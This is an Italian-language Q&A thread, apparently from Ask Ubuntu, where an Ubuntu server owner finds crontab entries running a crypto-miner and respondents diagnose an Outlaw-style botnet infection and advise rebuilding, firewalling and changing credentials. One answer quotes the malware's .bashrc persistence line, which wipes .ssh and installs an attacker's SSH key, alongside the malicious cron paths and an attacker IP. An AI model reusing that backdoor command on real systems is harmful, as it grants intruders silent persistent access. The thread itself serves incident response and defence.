Strange Cron Job occupa il 100% della CPU Ubuntu 18 LTS Server


21

Continuo a far apparire i lavori cronologici strambo e non ho idea di cosa facciano. In genere, lancio kill -9 per fermarli. Occupano il 100% della mia CPU e possono funzionare per giorni fino al mio controllo. Qualcuno sa cosa significa?

sudo crontab -l
0 0 */3 * * /root/.firefoxcatche/a/upd>/dev/null 2>&1
@reboot /root/.firefoxcatche/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.firefoxcatche/b/sync>/dev/null 2>&1
@reboot /root/.firefoxcatche/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.X13-unix/.rsync/c/aptitude>/dev/null 2>&1

Sto eseguendo il server Ubuntu 18 LTS completamente aggiornato a partire dal 24/07/2019

AGGIORNARE

Apprezzo tutti i feedback. Ho disconnesso tutti i dati e le unità applicative poiché l'unica cosa che è stata interessata è stata l'unità del sistema operativo, almeno ho fatto quel tipo di cose correttamente. Sto andando con una ricostruzione completa, con molta più sicurezza e metodi più sicuri.


8
.firefoxcatcheprobabilmente non ha nulla a che fare con Firefox - potrebbe essere solo un minatore di bitcoin? Prova a caricare i file eseguibili su virustotal.
Thom Wiggers, il

1
I file gestiti da quel crontab sono /root/.firefoxcatche/a/upde/root/.firefoxcatche/b/sync
Thom Wiggers il

2
"Non riesco a trovare il crontab per cancellarlo" cosa significa? perché sudo crontab -emodificare non funziona? Ma se questo è un cryptominer che non hai installato ... verranno aggiunti di nuovo. 1 ° sguardo in "/root/.firefoxcatche/a/upd" cosa fa.
Rinzwind,

2
"Devo accedere come root per arrivarci?" Questa è una domanda che non mi aspetto di vedere da un amministratore. Hai davvero bisogno di sapere cosa stai facendo d'ora in poi. Cambia la password dell'amministratore al più presto. Ispeziona i file elencati in cron. Eliminali.
Rinzwind,

1
ma è così semplice ;-) Mantengo più di 10 istanze cloud di Google. Con un piano di emergenza su qualsiasi cosa potessi immaginare di sbagliare. Se dovesse succedere qualcosa del genere, distruggerei l'istanza di root, ne creerei una nuova, scansionerei il disco dati contro un clone, scansionerei le differenze e poi lo collegerei all'istanza. e attuare qualcosa per intrappolare questa persona per evitare che accada di nuovo. Nel mio caso il mio stipendio dipende da questo ;-)
Rinzwind il

Risposte:


40

Molto probabilmente la tua macchina ha un'infezione da cripto-minatore. Puoi vedere qualcun altro che riporta nomi di file e comportamenti simili al rilevamento in tempo reale di una macchina virtuale in Azure con Security Center . Vedi anche Il mio Ubuntu Server ha un virus ... L'ho trovato ma non riesco a liberarmene ... su Reddit.

Non puoi più fidarti di quel computer e dovresti reinstallarlo. Fare attenzione con il ripristino dei backup.


8
Sono d'accordo. la password di root è stata compromessa, quindi reinstallare e fare molta attenzione con il backup; potrebbe anche essere lì.
Rinzwind,

9

La tua macchina è stata infettata da un attacco di cripto-minatore. In passato ho anche affrontato un attacco ransomware simile e il mio database è stato compromesso. Ho preso un dump SQL per la macchina e ho riprovisionato la macchina (poiché la mia macchina era una VM ospitata su AWS EC2). Ho anche modificato i gruppi di sicurezza della macchina per bloccare l'accesso SSH e le password modificate. Ho anche abilitato la registrazione per registrare le query ed esportarlo in S3 ogni notte.


4

Lo stesso è successo a me e l'ho notato ieri. Ho controllato il file /var/log/sysloge questo IP (185.234.218.40) sembrava eseguire automaticamente cronjobs.

L'ho controllato su http://whatismyipaddress.com ( https://whatismyipaddress.com/ip/185.234.218.40 ) e ha alcuni rapporti. Questi file sono stati modificati dal trojan:

  • .bashrc
  • .ssh / authorized_keys

Ho trovato questo alla fine .bashrc(che viene eseguito ogni volta bash è aperto):

set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~

Sta eliminando il tuo authorized_keysfile, che è un elenco di chiavi SSH che possono connettersi senza password. Quindi, aggiunge la chiave SSH dell'attaccante:

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr

Inoltre, ho trovato questa cartella:, /tmp/.X13-unix/.rsyncdove si trova tutto il malware. Ho anche trovato un file, /tmp/.X13-unix/.rsync/c/ipun file contenente 70.000 indirizzi IP, che molto probabilmente sono altre vittime o server di nodi.

Esistono 2 soluzioni: A:

  • Aggiungi un firewall che blocca tutte le connessioni in uscita tranne la porta 22 e altre che ritieni necessarie e abilita fail2ban, un programma che vieta un indirizzo IP dopo X tentativi di password falliti

  • Uccidi tutti i lavori cron:, ps aux | grep cronquindi uccidi il PID che viene visualizzato

  • Cambia la tua password in una sicura

B:

  • Eseguire il backup di tutti i file o cartelle necessari o desiderati

  • Ripristina il server e reinstalla Ubuntu o crea direttamente un nuovo droplet

    Come ha detto Thom Wiggers, fai sicuramente parte di una botnet di mining bitcoin e il tuo server ha una backdoor . La backdoor utilizza un exploit perl, un file che si trova qui /tmp/.X13-unix/.rsync/b/run:, contenente questo ( https://pastebin.com/ceP2jsUy )

Le cartelle più sospette che ho trovato sono:

  • /tmp/.X13-unix/.rsync

  • ~/.bashrc (che è stato modificato)

  • ~/.firefoxcatche

Infine, c'è un articolo relativo alla Perl Backdoor qui: https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/

Spero che lo trovi utile


Ho cancellato l'unità os e reinstallato Ubuntu creato una nuova password che è piuttosto lunga e nuove chiavi ssh
MCP_infiltrator

Sì, questa è una buona soluzione :)
Oqhax

Questa è stata una risposta molto utile - grazie per aver colto il fatto che ~/.bashrcera stato modificato. Ho scoperto che per uccidere il falso rsyncho dovuto rilasciare kill -9 <pid>.
Benny Hill il
Utilizzando il nostro sito, riconosci di aver letto e compreso le nostre Informativa sui cookie e Informativa sulla privacy.
Licensed under cc by-sa 3.0 with attribution required.